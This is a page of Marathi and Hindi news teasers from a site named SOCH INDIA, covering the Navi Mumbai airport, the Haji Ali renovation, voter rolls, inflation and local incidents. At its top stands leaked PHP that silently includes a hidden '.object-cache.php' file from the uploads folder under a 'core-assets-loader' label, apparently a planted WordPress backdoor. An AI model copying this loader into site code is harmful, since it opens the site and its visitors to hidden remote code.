add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

नवी मुंबई विमानतळाच्या उड्डाणाला प्रमुख अडथळा ठरलेली उलवा टेकडीची उंची सिडकोने आठ मीटपर्यंत कमी केल्यानंतर सिडकोला आता दक्षिण बाजूकडील ८० मीटर उंच असलेल्या एका दुसऱ्या टेकडीची उंची दहा मीटपर्यंत कमी करावी लागणार आहे. महिनाभरात या कामाला सुरुवात केली जाणार आहे. नागरी उड्डाण प्राधिकरणाच्या अधिकाऱ्यांनी मागील वर्षी या दुसऱ्या टेकडीची...

Read More

मुंबईतील प्रसिद्ध हाजी अली दर्ग्याचा कायापालट करण्यात येणार आहे. हाजी अलीच्या विकासासाठी राज्य सरकारने ३५ कोटींची तरतूद केली असून दर्ग्याच्या सौंदर्यीकरणाचे काम लवकरच सुरू करण्यात येणार आहे. राज्याचे बंदर विकास मंत्री आणि राज्याचे पालकमंत्री अस्लम शेख यांच्या दालनात बुधवारी बैठक झाली. या बैठकीत दर्ग्याच्या नुतनीकरण आणि सौंदर्यीकरणाच्या आराखड्याचे सादरी करण करण्यात...

Read More

महापालिका निवडणुकीसाठी राज्य निवडणूक आयोगाने केवळ ३१ जानेवारीपर्यंतच  नोंदणी झालेल्या मतदारांची नावे ग्रा धरली जाणार असल्याचे जाहीर केले आहे. त्यामुळे ३१ जानेवारीनंतर नावाची नोंदणी करणाऱ्या हजारो नव आणि स्थलांतरीत मतदारांना मतदानापासून वंचित राहावे लागण्याची चिन्हे आहेत. नवी मुंबई पालिकाक्षेत्रात बेलापूर आणि ऐरोली या दोन विधानसभा क्षेत्रांचा भाग आहे. त्यामुळे...

Read More

आधीच सुखावह नसलेल्या भारतीय अर्थव्यवस्थेचे चक्र आणखी मंदावले आहे. वाढत्या अन्नधान्याच्या किमतीने महागाईत इंधन ओतले, तर औद्योगिक उत्पादन गेल्या डिसेंबरअखेर शून्यानजीक आले. जानेवारी २०२० मधील ग्राहक किंमत निर्देशांकावर आधारित महागाईचा दर थेट ७.५९ टक्क्यांवर झेपावला आहे. हा दर मे २०१४ नंतरच्या वरच्या टप्प्यावर पोहोचला आहे. रिझव्‍‌र्ह बँकेच्या सहनशील अशा...

Read More

ठाणे महापालिका क्षेत्रातील घरगुती तसेच व्यावसायिक पाणी वापराच्या दरात ४० ते ५० टक्क्य़ांनी तर ठाणे परिवहन उपक्रमातील बसगाडय़ांच्या तिकीट दरात २० टक्क्य़ांनी वाढ करण्याचा निर्णय प्रशासनाने घेतला आहे. यासंबंधीचे दोन्ही प्रस्ताव प्रशासनाने येत्या २० फेब्रुवारी रोजी होणाऱ्या सर्वसाधारण सभेपुढे अंतिम मान्यतेसाठी सादर केले आहेत. मात्र, सत्ताधारी शिवसेनेसह विरोधी पक्षातील...

Read More

असम में बीजेपी शासित सरकार ने राज्य सरकार द्वारा संचालित मदरसों और संस्कृत विद्यालयों को बंद करने फैसला किया है. सरकार अब इन संस्थानों को स्कूलों में तब्दील करने जा रही है और अब वहां छात्रों को सामान्य कोर्स पढ़ाया जाएगा. असम के शिक्षा मंत्री हेमंत बिसवा सरमा ने...

Read More

तालुक्यातील सुपली या गावाजवळ पंढरपूर-सातारा राष्ट्रीय महामार्गावरील उजनी उजव्या कालव्यावरचा धोकादायक पूल अचानक कोसळला. स्थानिक तरुण  सचिन माळी व काही जागृत रहिवाशांच्या सतर्कतेमुळे मोठा अनर्थ टळला असून कोणतीही जीवितहानी झाली नाही. या मार्गावरील वाहतूक पर्यायी रस्त्यावरुन वळवण्यात आली असून सदर पुलाच्या ठिकाणी पर्यायी मार्ग करण्याचे काम  युद्धपातळीवर सुरू झाले...

Read More

‘फेसबुक’वरून अल्पवयीन मुलांचे लैंगिक साहित्य प्रसारित केलेल्या नऊ अश्लील चित्रफिती नालासोपारा तुळिंज पोलिसांनी जप्त केल्या आहेत.  ज्यांच्या नावे ‘आयपी’ (इंटरनेट प्रोटोकॉल) अ‍ॅड्रेस आहेत, त्यांचा पोलीस शोध घेत आहेत. व्यावसायिक वापरासाठी लहान मुलांचा वापर करून या अश्लील चित्रफिती तयार केल्या गेल्याची प्राथमिक शक्यता पोलिसांनी वर्तवली आहे. फेसबुकचा वापर करून अल्पवयीन...

Read More

दिल्लीच्या भजनपूरा भागात एका घरामध्ये पाच मृतदेह सापडले आहेत. हे सर्व मृतदेह एकाच कुटुंबातील सदस्यांचे असल्याचे दिल्ली पोलिसांकडून सांगण्यात आले. मृतदेहांची ओळख पटवण्यात आली असून, जोडप्यासह त्यांच्या तीन मुलांचे मृतदेह असल्याचे पोलिसांकडून सांगण्यात आले. नवरा ई-रिक्षा चालक होता. चार ते पाच दिवसांपूर्वी या सर्वांचा मृत्यू झाल्याची शक्यता आहे. पोलिसांना...

Read More